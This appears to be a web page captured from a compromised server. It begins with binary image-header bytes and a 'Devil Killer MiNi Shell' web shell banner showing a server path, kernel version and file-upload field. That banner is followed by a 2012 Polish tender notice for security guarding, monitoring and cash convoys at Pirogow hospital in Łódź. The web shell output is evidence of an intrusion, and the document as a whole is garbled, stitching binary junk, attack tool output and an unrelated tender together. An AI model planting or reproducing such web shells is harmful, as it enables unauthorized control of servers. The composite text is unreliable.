JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120326/68967-N-2012.html

<p class="kh_header"><b>Łódź: Świadczenie usługi ochrony osób i mienia na terenie 
Wojewódzkiego Specjalistycznego Szpitala im. M. Pirogowa w Łodzi</b><br>
<b>Numer ogłoszenia: 68967 - 2012; data zamieszczenia: 26.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Specjalistyczny Szpital im. M. Pirogowa w Łodzi , ul. Wólczańska 191/195, 90-531 Łódź, woj. łódzkie, tel. 042 6371322, faks 042 6371322.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pirogow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi ochrony osób i mienia na terenie 
Wojewódzkiego Specjalistycznego Szpitala im. M. Pirogowa w Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
-  Całodobowa ochrona  obiektów  i mienia wraz z dozorem wizyjnym terenu Szpitala przy ul. Wólczańskiej 191/195 - 2 posterunki, przy ul. Wileńskiej 37 - 3 posterunki.
- Monitorowanie obiektu Wojewódzkiego Ośrodka Diabetologii i Chorób Metabolicznych przy ul. Nowa 30/32. 
-  Konwojowanie - przewożenie gotówki z banku do Szpitala przy ul. Wólczańskiej 191/195  
-  zakres określony w załączniku nr 2 do SIWZ
                 Termin wykonywania usługi
 Umowa obejmować będzie wszystkie obiekty Zamawiającego i zostanie zawarta od momentu podpisania na okres 12 miesięcy. Termin wykonywania usługi na obiekcie Wileńska 37 będzie krótszy i obowiązywać będzie 
                 od  04.05.2012r. 

2.	Wymagania odnośnie przedmiotu zamówienia:

Przedmiotem zamówienia jest:
1. Całodobowa ochrona nieruchomości Szpitala  oraz ochrona bezpośrednia mienia i osób znajdujących się na   terenie nieruchomości i w bezpośrednim otoczeniu. 
- Ochrona osób polegać będzie na działaniach Wykonawcy, mających na celu zapewnienie bezpieczeństwa życia                      i zdrowia osób fizycznych znajdujących się na chronionym terenie,
 - Ochrona mienia Zamawiającego polegać będzie na działaniach Wykonawcy zapobiegających przestępstwom  przeciwko mieniu, polegającym na kradzieży, włamaniu, wandalizmie a także powstaniu szkody wynikającej z tych zdarzeń. Ochrona mienia obejmuje mienie znajdujące się na terenie obiektów Zamawiającego. Przez mienie Zamawiającego, podlegające ochronie, należy rozumieć w szczególności środki trwałe wpisane do ewidencji Zamawiającego oraz wartości pieniężne znajdujące się na terenie chronionego obiektu i zabezpieczone w sposób uniemożliwiający ich utratę.  
 - Ochrona winna być sprawowana poprzez pełnienie całodobowych dyżurów przez pracowników ochrony                              w następujących miejscach:

  1.1. Obiekt Wólczańska 191/195 

      1.1.1.   I  posterunek 
 usytuowany przy wjeździe głównym na teren Szpitala od strony ul. Wólczańskiej 191/195 obsługujący szlaban dla wjeżdżających na teren i wyjeżdżających samochodów. Pracownik ochrony wyposażony winien być w środki łączności z bazą firmy ochrony oraz przycisk p - napadowy, który w razie zagrożenia zapewni szybki dojazd do obiektu grupy patrolowo - interwencyjnej posiadającej środki przymusu bezpośredniego. Czas dojazdu grupy interwencyjnej max. 6 min od momentu uruchomienia przycisku p- napadowego.  Szlaban winien być cały czas zamknięty. Pracownik każdorazowo podchodząc do wjeżdżającego samochodu powinien sprawdzić czy pojazd wjeżdżający na teren szpitala posiada stosowną kartę upoważniającą do wjazdu.  Zarówno pracownicy jak i dostawcy wyposażeni są  przez szpital w stosowne karty upoważniające do wjazdu na teren Szpitala.   
         1.1.2.  II  posterunek
Usytuowany jest przy bramie wjazdowej od ul. Stefanowskiego i wyposażony jest w szlaban. Szlaban winien być cały czas zamknięty. Pracownik każdorazowo podchodząc do wjeżdżającego samochodu powinien sprawdzić czy pojazd wjeżdżający na teren Szpitala posiada stosowną kartę upoważniającą do wjazdu. Zarówno pracownicy jak i dostawcy wyposażeni są  przez Szpital w stosowne karty upoważniające do wjazdu na teren Szpitala.   
Zadaniem Pracownika ochrony w godzinach od 6.00 do 16.00 będzie kontrola wjeżdżających na teren Szpitala                           i wyjeżdżających samochodów, zaś po godzinie 16-tej - po zamknięciu bramy - kontrola całego terenu                                 z rejestrowaniem się w 4 punktach kontrolnych z częstotliwością 1 x godzinę. W tym celu zainstalowany winien być        w miejscach wskazanych przez zamawiającego na koszt wykonawcy elektroniczny system umożliwiający Zamawiającemu odczyt komputerowy mający na celu łatwą i szybką kontrolę pracy pracownika ochrony.
Pracownik ochrony podobnie jak na posterunku pierwszym wyposażony winien być w środki łączności z bazą firmy ochrony oraz przycisk p-napadowy, który w razie zagrożenia zapewni szybki dojazd do obiektu grupy patrolowo - interwencyjnej posiadającej środki przymusu bezpośredniego. Czas dojazdu grupy interwencyjnej max. 6 min. od momentu uruchomienia przycisku p-napadowego. W godzinach nocnych pracownik posterunku obchodowego ma mieć  także na wyposażeniu psa obronnego (średniej wielkości). Pies winien być własnością wykonawcy lub pracownika. Wszelkie czynności związane z utrzymaniem psa należą do wykonawcy. 

    1.1.3.  Obsługi Systemu dozoru wizyjnego terenu Szpitala przy ul. Wólczańskiej 191/195  
- W celu uzupełnienia ochrony fizycznej obiektu na terenie Szpitala  zainstalowany jest system  dozoru wizyjnego, wraz z archiwizacją obrazu. Wykonawca zobowiązany będzie do monitorowania sygnałów alarmowych ze Szpitala przy ul. Wólczańskiej 191/195
- Wymaga się archiwizacji ciągłych zapisów kamer z okresem 30 dni w maksymalnej jakości, przy minimum 2F/ 1 sec. 
- Wykonawca w ramach umowy wykonywał będzie na własny koszt bieżącą konserwacje obecnie eksploatowanego systemu dozoru wizyjnego. 
- Wykonawca w ramach umowy wykonywał będzie  na własny koszt wszelkie naprawy systemu dozoru wizyjnego, ale przed wykonaniem naprawy wymagającej wymianę elementu systemu dozoru wizyjnego winien uzyskać zgodę zamawiającego na jej wykonanie, w tym celu każdorazowo winien być przedstawiony kosztorys ofertowy na piśmie do zaakceptowania przez zamawiającego. Koszty materiałów niezbędnych do przeprowadzenia takiej naprawy ponosić będzie zamawiający. 


 1.2.  Obiekt  Wileńska 37
 
        1.2.1.  I  posterunek
Usytuowany jest przy bramie wjazdowej od ul. Karolewskiej (w przyszłości przeniesiony będzie od ul. Wileńskiej),        wyposażony jest w szlaban. Szlaban winien być cały czas zamknięty. Pracownik każdorazowo podchodząc do wjeżdżającego samochodu powinien sprawdzić czy pojazd wjeżdżający na teren Szpitala posiada stosowną kartę upoważniającą do wjazdu. Zarówno pracownicy jak i dostawcy wyposażeni są  przez Szpital w stosowne karty upoważniające do wjazdu na teren Szpitala.   
Zadaniem Pracownika ochrony w godzinach od 6.00 do 16.00 będzie kontrola wjeżdżających na teren Szpitala                i wyjeżdżających samochodów, zaś po godzinie 16-tej - po zamknięciu bramy - kontrola całego terenu                                z rejestrowaniem się w min. 5 punktach kontrolnych z częstotliwością 1 x godzinę. W tym celu zainstalowany winien w miejscach wskazanych przez zamawiającego być na koszt wykonawcy elektroniczny system  kontroli umożliwiający Zamawiającemu odczyt komputerowy mający na celu łatwą i szybką kontrolę pracy pracownika ochrony.
Pracownik ochrony  wyposażony winien być w środki łączności z bazą firmy ochrony oraz przycisk p - napadowy, który w razie zagrożenia zapewni szybki dojazd do obiektu grupy patrolowo - interwencyjnej posiadającej środki przymusu bezpośredniego. Czas dojazdu grupy interwencyjnej max. 6 min. od momentu uruchomienia przycisku p- napadowego. W godzinach nocnych pracownik posterunku obchodowego miałby także na wyposażeniu psa obronnego (średniej wielkości). Pies winien być własnością wykonawcy lub pracownika. Wszelkie czynności związane                                   z utrzymaniem psa należą do wykonawcy. 
       1.2.2.  II  posterunek
Usytuowany jest  w budynku Ginekologii  od strony  ul. Wileńskiej.  
Pracownik ochrony  wyposażony winien być w środki łączności z bazą firmy ochrony oraz przycisk p - napadowy, który w razie zagrożenia zapewni szybki dojazd do obiektu grupy patrolowo - interwencyjnej posiadającej środki przymusu bezpośredniego. Czas dojazdu grupy interwencyjnej max. 6 min. od momentu uruchomienia przycisku p- napadowego. Ponadto do obowiązków pracownika ochrony należeć będzie: 
- bezpłatne obsługiwanie szatni dla odwiedzających chorych i studentów, 
- obsługa centrali telefonicznej,
- obsługa podjazdu  do izby przyjęć dla karatek (wpuszczanie i wypuszczanie  karetek),
- wydawanie i przyjmowanie kluczy od pomieszczeń szpitalnych osobom upoważnionym do ich pobierania - 
   prowadzenie ewidencji w tym zakresie, 
- w okresie zimowym w godz. 15.00 do 7.00 rano - utrzymywanie w czystości, odśnieżanie i posypywanie mieszanką   
   soli z piaskiem podjazdu dla karetek oraz wejścia do budynku. 
       1.2.3.  III  posterunek
usytuowany jest w budynku Ginekologii od strony ul. Karolewskiej. 
Pracownik ochrony wyposażony winien być w środki łączności z bazą firmy ochrony oraz przycisk p - napadowy, który w razie zagrożenia zapewni szybki dojazd do obiektu grupy patrolowo - interwencyjnej posiadającej środki przymusu bezpośredniego. Czas dojazdu grupy interwencyjnej max. 6 min. od momentu uruchomienia przycisku p- napadowego. Ponadto do obowiązków pracownika ochrony należeć będzie: 
- bezpłatne obsługiwanie szatni dla odwiedzających chorych i studentów, 
- obsługa centrali telefonicznej,
- obsługa podjazdu  do izby przyjęć dla karatek (wpuszczanie i wypuszczanie  karetek),
- wydawanie i przyjmowanie kluczy od pomieszczeń szpitalnych osobom upoważnionym do ich pobierania 
- prowadzenie ewidencji w tym zakresie, 
- w okresie zimowym w godz. od 15.00 do 7.00 rano - utrzymywanie w czystości, odśnieżanie i posypywanie  mieszanką soli z piaskiem podjazdu dla karetek oraz wejścia do budynku,
       - we wszystkie dni  tygodnia w godz. od 15.00  do 7.00 rano - dostarczanie w razie potrzeby na oddziały szpitalne  (budynku Interny i budynku Ginekologii)  butli z gazami medycznym i technicznymi. W tym czasie ochronę 
obiektu przejmować będzie pracownik I posterunku . Czynność ta każdorazowo  winna być odnotowana w książce   raportów.  
   Osoby realizujące zadania ochrony obiektu posterunku III winni posiadać uprawnienia (zaświadczenie      kwalifikacyjne) do obsługi butli z gazami medycznym.

  1.3.  W ramach wykonywanej usługi  ochrony obiektu wykonawca  zobowiązany będzie:
- przekazać protokółem zdawczo - odbiorczym do dyspozycji Dyrekcji Szpitala 4 piloty przeciw- napadowe na cały czas obowiązywania umowy. Piloty przeciw- napadowe winny być monitorowane przez firmę wykonującą ochronę obiektu,
- sprawdzania czy w zaparkowanych samochodach wywieszone są, widoczne przez szybę karty upoważniające do wjazdu (tzw. wjazdówki),
- prowadzić książki raportów z przebiegu dyżurów, opisując wszystkie wydarzenia w ciągu zmiany (ew. zajścia                     i interwencje oraz w których ewidencjonowane będą również zaparkowane pojazdy bez wywieszonych, widocznych kart wjazdowych - do wglądu nadzoru i zamawiającego). 
- przedstawienia miesięcznych raportów,  
- zainstalować  na obiektach: Wólczańska 191/195, Wileńska 37 w terminie nie dłuższym niż 14 dni od podpisania   umowy elektroniczny system  kontroli umożliwiający  zamawiającemu odczyt komputerowy mający na celu łatwą           i szybką kontrolę pracy pracownika ochrony.    
   Wykonawca w ramach umowy wykonywał będzie  na własny koszt wszelkie naprawy  elektronicznego systemu   kontroli.   

2. Monitorowanie obiektu Wojewódzkiego Ośrodka Diabetologii i Chorób Metabolicznych przy ul. Nowa 30/32                   
    2.1. Elektroniczna  całodobowa ochrona mienia obiektu przy ul. Nowa 30/32 wraz  z podłączeniem do stacji 
           monitorowania. 
    2.2. Wykonawca w ramach umowy zobowiązany będzie do:
    -  włączenia obiektu do systemu monitorowania, 
    -  całodobowego monitorowania systemu alarmowego,    
    -  dojazdu do alarmu grup interwencyjnych. Czas dojazdu grupy interwencyjnej max. 6 min od momentu uruchomienia 
       alarmu.

3.  Konwojowanie - przewożenie gotówki z banku do Szpitala przy ul. Wólczańskiej 191/195  samochodem   
     przystosowanym do transportu wartości pieniężnych posiadającym dopuszczenia zgodne z obowiązującymi 
     przepisami, średnio 3 razy w miesiącu. 
   - Wykonawca zobowiązany będzie do realizacji tego zadania zgodnie z obowiązującymi przepisami dotyczącymi 
       zabezpieczenia i ochrony przewożonej gotówki. 
   -  Wykonawca zobowiązany będzie konwojować środki pieniężne od momentu ich przejęcia z banku do fizycznego 
       przewiezienia do szpitala. Odpowiedzialność rozpoczyna się od pobrania i odejścia kasjera szpitala z Sali 
      Operacyjnej  Banku do wejścia kasjera do pomieszczenia kasowego w Szpitalu. 
   -  Konwojowanie odbywać się będzie w terminach wyznaczonych przez Zamawiającego według potrzeb 
      uzgodnionych telefonicznie z jednodniowym wyprzedzeniem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 98.34.11.40-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  nie wymaga wniesienia  wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>winien posiadać koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji w zakresie usług ochrony osób i mienia zgodnie z  ustawą o ochronie osób i mienia z 22 sierpnia 1997r (tekst jednolity Dz. U. 2005r. 145 poz. 1221 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zadania polegające na ochronie obiektu przez okres minimum 12 miesięcy każde z zadań i o wartości minimum 80 000,00 zł brutto każde z zadań.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada:
- samochód do przewożenia wartości pieniężnych. spełniający wymagania  rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 7 września 2010 r. w sprawie wymagań, jakim powinna odpowiadać ochrona wartości pieniężnych przechowywanych i transportowych przez przedsiębiorców i inne jednostki organizacyjne   Dz. U. z 2010r. nr 166 poz. 1128.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada: 
-  minimum 3 grupy interwencyjne  z czasem dojazdu do  obiektów Szpitala  max. 6 minut od momentu uruchomienia  przycisku p- napadowego lub alarmu, 
- osób minimum 3 posiadających  uprawnienia (zaświadczenie kwalifikacyjne) do obsługi butli z gazami medycznym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia  w wysokości nie mniejszej niż  500.000,00  PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Oświadczenie o posiadaniu minimum 3 grup interwencyjnych z  dojazdem  do Szpitala max do 6 minut od momentu uruchomienia przycisku p- napadowego lub alarmu.
2. Oświadczenie o posiadaniu samochodu przystosowanego do przewożenia wartości pieniężnych. wg wymogów  rozporządzenia Ministra Spraw Wewnętrznych  i  Administracji z dnia 7 września 2010 r. w sprawie wymagań, jakim powinna odpowiadać ochrona wartości pieniężnych przechowywanych i transportowych  przez przedsiębiorców i inne jednostki organizacyjne Dz. U. z 2010r. nr 166 poz. 1128.
3. Oświadczenie o posiadaniu osób minimum 3 posiadających uprawnienia (zaświadczenie kwalifikacyjne) do obsługi butli z gazami medycznym.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo powinno być przedstawione w formie oryginału lub poświadczonej za zgodność z oryginałem kopii przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę umowy w przypadku: 
a)	zmiana stawek podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pirogow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Specjalistyczny Szpital im. M. Pirogowa w Łodzi, 90 -531 Łódź, ul. Wólczańska 191/195 budynek administracyjny parter  Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2012 godzina 10:00, miejsce: Wojewódzki Specjalistyczny Szpital im. M. Pirogowa w Łodzi, 90 -531 Łódź, ul. Wólczańska 191/195 budynek administracyjny parter  Dział Zamówień Publicznych.</p>
